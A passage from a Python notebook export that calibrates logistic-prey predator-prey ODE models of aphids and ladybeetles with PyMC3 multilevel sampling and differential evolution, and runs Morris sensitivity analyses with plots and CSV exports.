    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # Priors for initial conditions (fixed at the observed values).
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 here, while the fine model and coarse_model_1 use
    # lower=1 — confirm whether this difference is intentional.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions.
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Deterministic node: the ODE solution at the coarse time points.
    fitting_model = pm.Deterministic(
        "LP1_model",
        LP1_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# Run the MLDA sampler on the fine LP1 model with one coarse level.
with fine_model_LP1:
    # NOTE(review): only coarse_model_1 is used; coarse_model_2 built above
    # appears unused — confirm this is intentional.
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_LP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[258]:
# Quick visual sanity check of the a1 posterior samples.
plt.hist(trace_calibration_LP1['a1'], bins=35)
plt.show()
# In[259]:
# Variables whose posteriors are summarized and plotted below.
calibration_variable_names = [
    "std_deviation",
    "a1",
]
# In[260]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_LP1[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_LP1.png")
# In[261]:
az.plot_pair(
trace_calibration_LP1,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_LP1.png")
# In[262]:
df_stats_summary = az.summary(
data=trace_calibration_LP1,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[263]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the Most Probable Value of each variable in a PyMC trace.

    Vector-valued variables are decomposed per dimension and reported under
    keys of the form "name[d]"; scalar variables keep their own name.
    """
    mpv_by_name = dict()
    progress = tqdm(variable_names)
    for name in progress:
        progress.set_description(f"Calculating MPV from KDE for {name}")
        realizations = pm_trace[f"{name}"]
        # A 1D realization array has no second axis: treat it as scalar.
        try:
            n_dims = realizations.shape[1]
        except IndexError:
            n_dims = 0
        if n_dims == 0:
            mpv_by_name[f"{name}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            for dim in range(n_dims):
                component = np.array(realizations[:, dim])
                mpv_by_name[f"{name}[{dim}]"] = _scalar_rv_mvp_estimation(component)
    return mpv_by_name
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of an ArviZ stats summary with an extra "mpv" column.

    The column is aligned on the summary's index via the dict keys; variables
    missing from *rv_modes_dict* get NaN. The input frame is not mutated.
    """
    summary_with_mpv = arviz_summary.copy()
    mpv_series = pd.Series(
        data=list(rv_modes_dict.values()), index=list(rv_modes_dict.keys())
    )
    summary_with_mpv["mpv"] = mpv_series
    return summary_with_mpv
# In[264]:
# Attach the KDE-based MPV estimates to the ArviZ summary and persist it.
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_LP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_LP1.csv") # saving to a CSV file for later inspection
df_stats_summary
# In[265]:
# 95% credible band (2.5th-97.5th percentiles) and median of the simulated
# trajectories across posterior realizations.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_LP1["LP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_LP1["LP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_LP1["LP1_model"], 50, axis=0)
# In[266]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_LP1.png", dpi=300)
plt.show()
# In[267]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_LP1.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_LP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[268]:
df_realizations
# # Logistic Prey Growth FR2 model
# In[410]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def LP2_model(
    t,
    X,
    r1 = 1,
    r2 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """RHS of the LP2 system: logistic prey growth with a saturating (FR2)
    predation term; the predator density is held constant."""
    prey, predator = X
    prey_rate = r1 * prey - r2 * prey * prey - a1 * prey * predator / ( a2 + a3 * prey )
    predator_rate = 0
    return prey_rate, predator_rate
def LP2_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    r2 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Integrate the LP2 system over *t_span* from state *y0*.

    Uses LSODA (automatic stiff/non-stiff switching) and reports the solution
    at the requested *t_eval* points; returns the solve_ivp result object.
    """
    return solve_ivp(
        fun=LP2_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, r2, a1, a2, a3),
        method="LSODA",
    )
# Time grid matching the experimental observation window (no forecasting).
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
# Observed densities used as calibration targets.
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[411]:
def LP2_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares residual between observations and an LP2 run.

    :param par: iterable of model parameters forwarded to *fitting_model*.
    :param time_exp: experimental time points (also used as t_eval).
    :param f_exp: pair (prey series, predator series) of observed densities.
    :param fitting_model: solver with signature (y0, t_span, t_eval, *par)
        returning an object with `.t` and `.y` (solve_ivp-like).
    :param initial_conditions: initial state y0 passed to the solver.
    :return: mean of the weighted sums of squared residuals, or 1e15 when the
        integration raises ValueError (steers global optimizers away from
        regions where the ODE cannot be solved).
    """
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *par)
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Deliberate best-effort: a failed integration gets a huge penalty
        # instead of aborting the optimization.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Progress callback for scipy's differential_evolution: prints the
    current best parameter vector after each generation."""
    print('parameters = {}\n'.format(xk))
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[412]:
from scipy import optimize
# Fixed seed so the stochastic Differential Evolution search is reproducible.
seed = 1234
# Nominal parameter values (presumably from a previous calibration run —
# TODO confirm provenance); bounds are built as a multiplicative band
# [0.1x, 1.9x] around them.
r1=0.10437445097500309
r2=5.107493312221164e-07
a1=0.01929726300101605
a2=0.45099505926342665
a3=0.0002915398916649021
denom_min = 0.1
denom_max = 1.9
bounds_LP2 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
    ( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
    ( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
    ( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
    ( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
# Global least-squares calibration of the LP2 parameters.
result_LP2 = optimize.differential_evolution(
    LP2_least_squares_error_ode,
    bounds=bounds_LP2,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        LP2_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000, # 2000
    polish=True,
    disp=True,
    seed = seed, # for the sake of reproducibility
    callback=callback_de,
    workers=-1,  # use all available cores
)
print(result_LP2)
# * Retrieving the calibrated parameter values:
# In[413]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_LP2.x
solution_ODE_LP2 = LP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_LP2.x
)
t_computed_LP2, y_computed_LP2 = solution_ODE_LP2.t, solution_ODE_LP2.y
u_LP2, v_LP2 = y_computed_LP2
parameters_dict = {
"Model": "LP2",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[414]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_LP2, u_LP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_LP2, v_LP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[415]:
from SALib.sample.morris import sample as ee_sample
# Nominal parameter values around which Morris trajectories are sampled.
mean_values_params = [
    r1,
    r2,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
# Each factor is perturbed by +/-50% around its nominal value.
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[416]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
# QoI: the least-squares objective evaluated at each Morris sample.
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    residual_least_squares_result = LP2_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        LP2_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[417]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
# Normalize mu* so that the indices sum to one across factors.
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
    df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[418]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_LP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[419]:
from SALib.sample.morris import sample as ee_sample
# Same Morris problem definition as before; the QoI is now the simulated
# prey trajectory itself (one sensitivity analysis per time point later).
mean_values_params = [
    r1,
    r2,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[420]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
# Rows: Morris samples; columns: time points of the prey trajectory.
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_LP2 = LP2_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_LP2.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[421]:
from SALib.analyze.morris import analyze as ee_analyze
# Time-dependent Morris analysis: one analysis per time point of the
# simulated prey trajectory; mu* and sigma are normalized per time point.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit. Time points whose analysis fails are skipped here and
        # removed by dropna() below.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)  # drop the first time point — presumably degenerate at t0; confirm
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[422]:
df_sigmai
# In[423]:
# Stacked bars of normalized mu* over time (every 2nd valid time point).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): the formatter indexes valid_times_to_plot_mu with the raw tick
# value `x` — this assumes ticks are integer bar positions; confirm.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_LP2.png", dpi=300)
plt.show()
# In[424]:
# Same plot for the normalized sigma (interaction/nonlinearity measure).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_LP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[425]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the prey (pest) right-hand side of ``ode_model`` along a trajectory.

    For every time point the model is called on the stacked ``[u, v]`` state
    with the given parameters, and only the first returned component (the prey
    time-derivative) is kept.

    Returns a numpy array with one derivative value per entry of ``time_array``.
    """
    prey_rates = [
        ode_model(instant, [u_array[idx], v_array[idx]], *model_pars)[0]
        for idx, instant in enumerate(time_array)
    ]
    return np.array(prey_rates)
# In[426]:
# Prey time-derivative along the calibrated LP2 trajectory, evaluated with
# the nominal (mean) parameter values.
pest_time_derivative_array = calculate_pest_time_derivative_series(
    t_computed_LP2,
    u_LP2,
    v_LP2,
    LP2_model,
    mean_values_params
)
pest_time_derivative_array
# In[427]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_LP2, u_LP2, '-x', label='Pest population')
plt.plot(t_computed_LP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_LP2.png", dpi=300)
plt.show()
# In[428]:
# Morris problem for the time-derivative QoI (same +/-50% bounds as before).
mean_values_params = [
    r1,
    r2,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[429]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
# For each Morris sample: integrate the ODE, then evaluate the prey
# time-derivative along that realization's own trajectory.
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_LP2 = LP2_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_LP2.y
    pest_time_derivative_array = calculate_pest_time_derivative_series(
        time_range,
        u_realization,
        v_realization,
        LP2_model,
        parameters_realization
    )
    qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[430]:
# Time-dependent Morris analysis of the prey time-derivative QoI.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit. Failed time points are skipped and cleaned up by
        # dropna() below.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)  # drop the first time point — presumably degenerate at t0; confirm
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[431]:
df_sigmai
# In[432]:
# Stacked bars of normalized mu* for the derivative QoI over time.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): formatter indexes by raw tick value `x`; assumes integer bar positions.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_LP2.png", dpi=300)
plt.show()
# In[433]:
# Same plot for the normalized sigma of the derivative QoI.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_LP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[434]:
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,
        t.dscalar, # r1
        t.dscalar, # r2
        t.dscalar, # a1
        t.dscalar, # a2
        t.dscalar, # a3
        t.dscalar, # u0
        t.dscalar, # v0
    ],
    otypes=[t.dmatrix]
)
def LP2_ode_wrapper(time_exp, r1, r2, a1, a2, a3, u0, v0):
    """Theano-compatible op: integrate LP2_model over the observed times.

    Wraps scipy's LSODA integration so PyMC3 can use it inside a model
    graph. Returns an (n_times, 2) matrix with the two simulated state
    components stacked column-wise.
    """
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, r2, a1, a2, a3]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        LP2_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack the two state trajectories as columns to match the (obs, 2)
    # layout of the observed data.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[435]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000 # NOTE(review): pm.sample below hard-codes draws=4500; this value is unused there — confirm intent
start_time = time.time()
percent_calibration = 0.95
# Fine (full-resolution) model: priors only on r1 and a1; r2, a2, a3 and the
# initial conditions are held fixed via pm.Data.
with pm.Model() as fine_model_LP2:
    # Prior distributions for the model's parameters
    r1_ = pm.Uniform(
        "r1",
        lower=(1.0 - percent_calibration) * r1,
        upper=(1.0 + 10 * percent_calibration) * r1,
    )
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)  # held fixed at its deterministic value
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + 10 * percent_calibration) * a1,
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)  # held fixed
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)  # held fixed
    # Priors for Initial Conditions (also held fixed)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=800, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "LP2_model",
        LP2_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse level 1 for MLDA: every 4th observation.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters
    r1_ = pm.Uniform(
        "r1",
        lower=(1.0 - percent_calibration) * r1,
        upper=(1.0 + 10 * percent_calibration) * r1,
    )
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + 10 * percent_calibration) * a1,
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=800, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    # NOTE(review): u0_ and v0_ below are the pm.Data variables created inside
    # fine_model_LP2 (this model defines no initial-condition data of its own)
    # — confirm this cross-model reuse is intended.
    fitting_model = pm.Deterministic(
        "LP2_model",
        LP2_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
